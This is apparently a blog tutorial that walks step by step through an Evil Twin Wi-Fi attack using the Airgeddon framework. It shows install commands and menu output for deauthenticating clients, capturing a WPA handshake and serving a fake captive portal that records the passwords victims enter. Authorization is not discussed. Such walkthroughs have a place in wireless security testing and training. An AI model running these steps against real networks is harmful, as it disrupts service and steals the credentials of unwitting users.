Evil Twin Attack

evil_twin_attack

Installing Airgeddon from github

Install/download Airgeddon from github and run it:

				
					git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
sudo bash ./airgeddon.sh
				
			

Check if the all the tools are installed, before running the airgeddon framework

				
					Essential
ifconfig .... Ok
iwconfig .... Ok
iw .... Ok
awk .... Ok
airmon-ng .... Ok
airodump-ng .... Ok
aircrack-ng .... Ok
xterm .... Ok
ip .... Ok
lspci .... Ok
ps .... Ok

Optional
sslstrip .... Ok
asleap .... Ok
bettercap .... Ok
packetforge-ng .... Ok
etterlog .... Ok
hashcat .... Ok
wpaclean .... Ok
john .... Ok
aireplay-ng .... Ok
bully .... Ok
ettercap .... Ok
mdk4 .... Ok
hostapd .... Ok
lighttpd .... Ok
pixiewps .... Ok
wash .... Ok
openssl .... Ok
dhcpd .... Ok
reaver .... Ok
dnsspoof .... Ok
beef-xss .... Ok
hostapd-wpe .... Ok
iptables .... Ok
crunch .... Ok

				
			

Select the preferred network interface

				
					***************************** Interface selection ******************************
Select an interface to work with:
---------
1.  eth0  // Chipset: Broadcom Corp. BCM2046B1
2.  wlan0 // 2.4Ghz // Chipset:  Realtek Semiconductor Corp. RTL8812AU
---------
*Hint* Every time you see a text with the prefix [PoT] acronym for "Pending of Translation", means the translation has been automatically generated and is still pending of review
---------
				
			

In the main menu, set your interface into monitoring state with option 2.
Then select option 7  for Evil Twin attacks menu.

				
					***************************** airgeddon main menu ******************************
Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz

Select an option from menu:
---------
0.  Exit script
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
---------
4.  DoS attacks menu
5.  Handshake tools menu
6.  Offline WPA/WPA2 decrypt menu
7.  Evil Twin attacks menu
8.  WPS attacks menu
9.  WEP attacks menu
10. Enterprise attacks menu
---------
11. About & Credits
12. Options and language menu
---------
*Hint* If you install ccze you'll see some parts of airgeddon in a colorized way with better aspect. It's not a requirement or a dependency, but it will improve the user experience
---------
				
			

Then select option 9 for the evil twin ap attack, with captive portal (This could be custom builds) 

				
					**************************** Evil Twin attacks menu ****************************
Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz
Selected BSSID: None
Selected channel: None
Selected ESSID: None

Select an option from menu:
---------
0.  Return to main menu
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
4.  Explore for targets (monitor mode needed)
---------------- (without sniffing, just AP) -----------------
5.  Evil Twin attack just AP
---------------------- (with sniffing) -----------------------
6.  Evil Twin AP attack with sniffing
7.  Evil Twin AP attack with sniffing and sslstrip
8.  Evil Twin AP attack with sniffing and bettercap-sslstrip2/BeEF
------------- (without sniffing, captive portal) -------------
9.  Evil Twin AP attack with captive portal (monitor mode needed)
---------
*Hint* In order to use the Evil Twin just AP and sniffing attacks, you must have another one interface in addition to the wifi network interface will become the AP, which will provide internet access to other clients on the network. This doesn't need to be wifi, can be ethernet
---------
				
			

Press enter and wait for the framework to collect/detect the wifi networks.
Press control+c to stop searching and then select you wifi network for the test.
For this to work, you should choose the orange network with the asterix

				
					An exploration looking for targets is going to be done...
Press [Enter] key to continue...

**************************** Exploring for targets ****************************
Exploring for targets option chosen (monitor mode needed)
Selected interface qlan0mon is in monitor mode. Explorations can be performed
WPA/WPA2 filter enabled in scan. When started, press [Ctrl+C] to stop...
Press [Enter] key to continue...
				
			

On the next menu, pick your preferred de-authentication attack. 
Choose for yes, when asked for DoS persuit mode, which follows the ap when it moves to another channel. 

				
					Select an option from menu:
---------
0.  Return to Evil Twin attacks menu
---------
1.  Deauth / disassoc amok mdk3 attack
2.  Deauth aireplay attack
3.  WIDS / WIPS / WDS Confusion attack
---------
*Hint* If you can't deauth clients from an AP using an attack, choose another one :)
---------
2

If you want to integrate "DoS pursuit mode" on an Evil Twin attack, another additional wifi interface in monitor mode will be needed to be able to perform it

Do you want to enable "DoS pursuit mode"? This will launch again the attack if target AP change its channel countering "channel hopping" [y/N]
N
At this point there are two options to prepare the captive portal. Either having an interface with internet access, or making a fake DNS using dnsspoof

Are you going to use the interface with internet access method? If the answer is no ("n"), you'll need dnsspoof installed to continue. Both will be checked [y/N]
N
				
			

Choose No for the question if you already captured the handshake. 
Then select Yes/No if you want to spoof your mac-address.

				
					Do you want to spoof your MAC address during this attack? [y/N]
N
This attack requires that you have previously a WPA/WPA2 network captured Handshake file

If you don't have a captured Handshake file from the target network you can get it now
---------

Do you already have a captured Handshake file? Answer yes ("y") to enter the path or answers no ("n") to capture a new one now [y/N]
N
				
			

Then start the capturing process and wait for the WPA Handshake. The terminals are close when it’s done. And when the handshake is captures, choose the path for saving it.

				
					Choose the language in which network clients will see the captive portal:
---------
0.  Return to Evil Twin attacks menu
---------
1.  English
2.  Spanish
3.  French
4.  Catalan
5.  Portuguese
6.  Russian
7.  Greek
8.  Italian
9.  Polish
10. German
				
			

Then there are 6 terminals opened, each displaying there proces. On the top right screen, you see the connected clients and the password the entered.

Leave a Reply

Your email address will not be published. Required fields are marked *

Previous Post

View connected Wi-Fi password

Next Post

NMAP Commands

Related Posts